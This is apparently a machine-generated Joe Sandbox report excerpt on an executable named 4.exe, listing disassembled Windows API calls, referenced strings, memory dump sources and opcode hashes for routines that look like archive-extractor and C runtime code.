                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ItemText$DialogWindow
                    • String ID: RENAMEDLG
                    • API String ID: 445417207-3299779563
                    • Opcode ID: b6a7d191fe1bd7c825908a00a295cef89ba06edae9fbd9855ceb3d6e232587a1
                    • Instruction ID: 715cd72e9deb568bff9d5c822396973f2b0c993cb580b7973e23830f57c5e6b0
                    • Opcode Fuzzy Hash: b6a7d191fe1bd7c825908a00a295cef89ba06edae9fbd9855ceb3d6e232587a1
                    • Instruction Fuzzy Hash: F30124322813107AE2248B689C89F673BEDFF4E701F048891F365B70D0CEA2EC148765
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B891E6,?,?,00B89186,?,00B9D570,0000000C,00B892DD,?,00000002), ref: 00B89255
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B89268
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00B891E6,?,?,00B89186,?,00B9D570,0000000C,00B892DD,?,00000002,00000000), ref: 00B8928B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: c384abea8565b18e6c5f50038e832ba421cb05ca0ea6f1b55ad7a8c9c67c2a76
                    • Instruction ID: 17575d338f662d4101a9750574da1d043bef820999bfe51738766696fdf24403
                    • Opcode Fuzzy Hash: c384abea8565b18e6c5f50038e832ba421cb05ca0ea6f1b55ad7a8c9c67c2a76
                    • Instruction Fuzzy Hash: 53F03C30A54208BBDF51AFA4DC09BADBFF4EB44755F0541A9F905A2171CF309E41CB90
                    APIs
                      • Part of subcall function 00B71B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B71B56
                      • Part of subcall function 00B71B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7063A,Crypt32.dll,00000000,00B706B4,00000200,?,00B70697,00000000,00000000,?), ref: 00B71B78
                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B70646
                    • GetProcAddress.KERNEL32(00BAA1F0,CryptUnprotectMemory), ref: 00B70656
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                    • API String ID: 2141747552-1753850145
                    • Opcode ID: a1e99c46db1720f36cb625be00eb4d414e91f1ce0749a08009dc00a34d4ead37
                    • Instruction ID: 940dea49845e1a3e5d8df4bb318a93efbc85b9563cdace5ddcdfecaef200e544
                    • Opcode Fuzzy Hash: a1e99c46db1720f36cb625be00eb4d414e91f1ce0749a08009dc00a34d4ead37
                    • Instruction Fuzzy Hash: AAE086708157119EDB306F78E958F027FE49F14700F00C8AEE2DA93261DBB4D4428B10
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AdjustPointer$_abort
                    • String ID:
                    • API String ID: 2252061734-0
                    • Opcode ID: 43c497070193b5770e2fab59ff205a138a4aef31a3c157fd3efbf41e0dd68489
                    • Instruction ID: f9cccf86b62e71c904bb40b3a2b6e2371ea828eb3bb0c99d90fb862bfc30ab92
                    • Opcode Fuzzy Hash: 43c497070193b5770e2fab59ff205a138a4aef31a3c157fd3efbf41e0dd68489
                    • Instruction Fuzzy Hash: 8C51CD72600202DFEB29AF15D891B6AB7E4EF54F11F1445ADEC02572B0E775EE80CBA0
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 00B8D0F9
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B8D11C
                      • Part of subcall function 00B8A7FE: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B85594,?,0000015D,?,?,?,?,00B86A70,000000FF,00000000,?,?), ref: 00B8A830
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B8D142
                    • _free.LIBCMT ref: 00B8D155
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B8D164
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: 08dd09984febf1c37398a3647f5a32f73a2bf4855a4215bca14f8f4a69dd1684
                    • Instruction ID: fd2fc1c58a93bae261ac496dd8d096d45b6f1e3dad126ed79c6c04c897461f82
                    • Opcode Fuzzy Hash: 08dd09984febf1c37398a3647f5a32f73a2bf4855a4215bca14f8f4a69dd1684
                    • Instruction Fuzzy Hash: 8C0152626012257F272176A66C8CC7B6BBDEEC6BA0315016BB908E7260EE648C02C271
                    APIs
                    • GetLastError.KERNEL32(?,?,?,00B8A7F0,00B8C348,?,00B8A543,00000001,00000364,?,00B853FD,?,?,00BA30C4), ref: 00B8A59E
                    • _free.LIBCMT ref: 00B8A5D3
                    • _free.LIBCMT ref: 00B8A5FA
                    • SetLastError.KERNEL32(00000000,?,00BA30C4), ref: 00B8A607
                    • SetLastError.KERNEL32(00000000,?,00BA30C4), ref: 00B8A610
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: 997f5067c9b4d1f77208d1184b8d63e397eefc97c43234229e9e43f3cb09b2c0
                    • Instruction ID: 31b5ef41c723e7a0b2326bd88296d9daab9c6532579041355ac59ed9714f73e7
                    • Opcode Fuzzy Hash: 997f5067c9b4d1f77208d1184b8d63e397eefc97c43234229e9e43f3cb09b2c0
                    • Instruction Fuzzy Hash: 3C01F476144600A7B21237646D86D6B3AEADBD27B172900ABF905A31B2FF708D42D366
                    APIs
                      • Part of subcall function 00B724EF: ResetEvent.KERNEL32(?), ref: 00B72501
                      • Part of subcall function 00B724EF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B72515
                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B72241
                    • CloseHandle.KERNEL32(?,?), ref: 00B7225B
                    • DeleteCriticalSection.KERNEL32(?), ref: 00B72274
                    • CloseHandle.KERNEL32(?), ref: 00B72280
                    • CloseHandle.KERNEL32(?), ref: 00B7228C
                      • Part of subcall function 00B72303: WaitForSingleObject.KERNEL32(?,000000FF,00B72420,?,?,00B7249F,?,?,?,?,?,00B72489), ref: 00B72309
                      • Part of subcall function 00B72303: GetLastError.KERNEL32(?,?,00B7249F,?,?,?,?,?,00B72489), ref: 00B72315
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                    • String ID:
                    • API String ID: 1868215902-0
                    • Opcode ID: 39ad31f7887d89d31d99ee5af246ec5fc8f437abc24ae696c035a90cce763fad
                    • Instruction ID: 92788bf63210e1172637bf0151204881597291c19a8dbf256734d3306897cb10
                    • Opcode Fuzzy Hash: 39ad31f7887d89d31d99ee5af246ec5fc8f437abc24ae696c035a90cce763fad
                    • Instruction Fuzzy Hash: 46017172400704EFC7229B64DE85FC6BBE9FB08710F01896AF26B92160CB756A56CB54
                    APIs
                    • _free.LIBCMT ref: 00B8D9D7
                      • Part of subcall function 00B8A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?), ref: 00B8A680
                      • Part of subcall function 00B8A66A: GetLastError.KERNEL32(?,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?,?), ref: 00B8A692
                    • _free.LIBCMT ref: 00B8D9E9
                    • _free.LIBCMT ref: 00B8D9FB
                    • _free.LIBCMT ref: 00B8DA0D
                    • _free.LIBCMT ref: 00B8DA1F
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: c2a9f89594f43a752086267bf131359f8d20ae8901f31840126af9d741c2523c
                    • Instruction ID: ff4d886493fae46883df1f51d7b6aafcd03942322d7c917378534078843fc84b
                    • Opcode Fuzzy Hash: c2a9f89594f43a752086267bf131359f8d20ae8901f31840126af9d741c2523c
                    • Instruction Fuzzy Hash: E0F0FF72914200EB9624FB64E586C1A73E9FB05B11B680C8BF04CD75A5DA71FC80D754
                    APIs
                    • _wcslen.LIBCMT ref: 00B73340
                    • _wcslen.LIBCMT ref: 00B73351
                    • _wcslen.LIBCMT ref: 00B73361
                    • _wcslen.LIBCMT ref: 00B7336F
                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00B6C844,?,?,00000000,?,?,?), ref: 00B7338A
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen$CompareString
                    • String ID:
                    • API String ID: 3397213944-0
                    • Opcode ID: ad21d680031fecb6c4ee603097ff438c15291f9c23f654369030d1206b5ef045
                    • Instruction ID: 3664918ce9db5b7f1d9c41ea45ae7a9a1f730bf0176e9330ce7f3ec8547908a4
                    • Opcode Fuzzy Hash: ad21d680031fecb6c4ee603097ff438c15291f9c23f654369030d1206b5ef045
                    • Instruction Fuzzy Hash: 50F01D32008115BBCF226F61DC09CCE3FA6EB94B64B128056F62D5A061CF329665D794
                    APIs
                    • _free.LIBCMT ref: 00B89CEE
                      • Part of subcall function 00B8A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?), ref: 00B8A680
                      • Part of subcall function 00B8A66A: GetLastError.KERNEL32(?,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?,?), ref: 00B8A692
                    • _free.LIBCMT ref: 00B89D00
                    • _free.LIBCMT ref: 00B89D13
                    • _free.LIBCMT ref: 00B89D24
                    • _free.LIBCMT ref: 00B89D35
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 202c20cdf0b6c1921d81f2ed482e5ab400eac90d056e1473f02f695b941434df
                    • Instruction ID: 16d8fac492324e18a1a615c48c7cfe3e6f96ae6655b1932f39886c5e7f4baa8b
                    • Opcode Fuzzy Hash: 202c20cdf0b6c1921d81f2ed482e5ab400eac90d056e1473f02f695b941434df
                    • Instruction Fuzzy Hash: 3AF0DA718251209BDA01BF14FC53C197BF1F72BB21709068BF41A57275EFB20A51DB85
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _swprintf
                    • String ID: %ls$%s: %s
                    • API String ID: 589789837-2259941744
                    • Opcode ID: 8f9a44a0460cc5b67b733ba20e5b8738241707ca536f26081eebd673a02997ec
                    • Instruction ID: 6ec0df559b603da915a8426b332298729802821ea423ef172c050ff5637bf6f1
                    • Opcode Fuzzy Hash: 8f9a44a0460cc5b67b733ba20e5b8738241707ca536f26081eebd673a02997ec
                    • Instruction Fuzzy Hash: B751D136688301FEEA211B948C82F3676E4EF14B01F28C5E6B7BF641E5CAA19550A717
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\4.exe,00000104), ref: 00B89370
                    • _free.LIBCMT ref: 00B8943B
                    • _free.LIBCMT ref: 00B89445
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Users\user\AppData\Local\Temp\4.exe
                    • API String ID: 2506810119-1708109389
                    • Opcode ID: c163a6fce1cb565d9d0ba4120ad5c9aca0ced882f9039434d1b331441d84b548
                    • Instruction ID: 1eb273553e37ade6d722d4aa2a63daf5a5b3f2af339cc5f8faf03a89debb04a4
                    • Opcode Fuzzy Hash: c163a6fce1cb565d9d0ba4120ad5c9aca0ced882f9039434d1b331441d84b548
                    • Instruction Fuzzy Hash: 2B316F71A04258EFDF21EF99D885DAEBBF8EB89710B1840E6F50497261D7708E41CB91
                    APIs
                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B8438B
                    • _abort.LIBCMT ref: 00B84496
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: EncodePointer_abort
                    • String ID: MOC$RCC
                    • API String ID: 948111806-2084237596
                    • Opcode ID: 4af8af374d904f605947357a1e3ce8eeb8e669565e941603cd90a1193d992899
                    • Instruction ID: ec66b3a8e1198d05bce232238f3da3055afca76acb97d77597a7a9309954c9ec
                    • Opcode Fuzzy Hash: 4af8af374d904f605947357a1e3ce8eeb8e669565e941603cd90a1193d992899
                    • Instruction Fuzzy Hash: AF41487190020AEFDF15EF98DD81AAEBBF5FF48304F1880A9FA04A7221D7359961DB50
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B67F20
                      • Part of subcall function 00B642F1: __EH_prolog.LIBCMT ref: 00B642F6
                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B67FE5
                      • Part of subcall function 00B68704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B68713
                      • Part of subcall function 00B68704: GetLastError.KERNEL32 ref: 00B68759
                      • Part of subcall function 00B68704: CloseHandle.KERNEL32(?), ref: 00B68768
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                    • API String ID: 3813983858-639343689
                    • Opcode ID: d3611116ad4dea8ecaaf4613f3389dd214f48d46c3a6108af830331dede2cb13
                    • Instruction ID: 997b7017987ef932f691290a4015b158db87b057db1f54a3038e0fe27f8dcbb9
                    • Opcode Fuzzy Hash: d3611116ad4dea8ecaaf4613f3389dd214f48d46c3a6108af830331dede2cb13
                    • Instruction Fuzzy Hash: 3F31E071940244AEEF31EBA49C06FFE7BE9EB05718F0040A5F448A7191DFB88D84DBA1
                    APIs
                      • Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
                      • Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350
                    • EndDialog.USER32(?,00000001), ref: 00B7BE68
                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B7BE7D
                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B7BE92
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ItemText$DialogWindow
                    • String ID: ASKNEXTVOL
                    • API String ID: 445417207-3402441367
                    • Opcode ID: b390055b87edf7440ed14837ced37cbd9aef30c23bb0cb021568b4bf646a280a
                    • Instruction ID: 2526dd2354a23c6290748905af8145bf0078572d34dd4f02709d9962e74c8440
                    • Opcode Fuzzy Hash: b390055b87edf7440ed14837ced37cbd9aef30c23bb0cb021568b4bf646a280a
                    • Instruction Fuzzy Hash: 8311B432600211BFD7119F68DC49FAB37E9EB4EB40F048894F754E72B4CB6299058B65
                    APIs
                    • __fprintf_l.LIBCMT ref: 00B6EC74
                    • _strncpy.LIBCMT ref: 00B6ECBA
                      • Part of subcall function 00B730F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00BA3070,?,00B6EC48,00000000,?,00000050,00BA3070), ref: 00B73112
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                    • String ID: $%s$@%s
                    • API String ID: 562999700-834177443
                    • Opcode ID: 6305cc5111ec6656716e7c39b516ac876ea208d7d9fee2e5f2d3b62ea29dfb6d
                    • Instruction ID: 79d94530cab762ce330e4e8d63946a4fc221d3eebcbe01e25a3112b9ea92bd32
                    • Opcode Fuzzy Hash: 6305cc5111ec6656716e7c39b516ac876ea208d7d9fee2e5f2d3b62ea29dfb6d
                    • Instruction Fuzzy Hash: 8921AF76440308AEEF20EEA4CE42FEF3BE8EF05700F1405A2F925961A1E779D644CB61
                    APIs
                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B6C04A,00000008,?,00000000,?,00B6E685,?,00000000), ref: 00B721A5
                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B6C04A,00000008,?,00000000,?,00B6E685,?,00000000), ref: 00B721AF
